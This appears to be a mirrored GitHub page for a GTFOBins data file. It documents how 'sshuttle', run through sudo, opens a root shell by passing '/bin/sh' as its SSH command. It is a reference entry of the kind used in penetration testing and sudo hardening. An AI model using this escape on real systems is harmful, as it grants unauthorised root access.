mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 14:36:23 +01:00
9 lines
145 B
Plaintext
9 lines
145 B
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
sudo sshuttle -r x --ssh-cmd '/bin/sh -c "/bin/sh 0<&2 1>&2"' localhost
|
|
contexts:
|
|
sudo:
|
|
...
|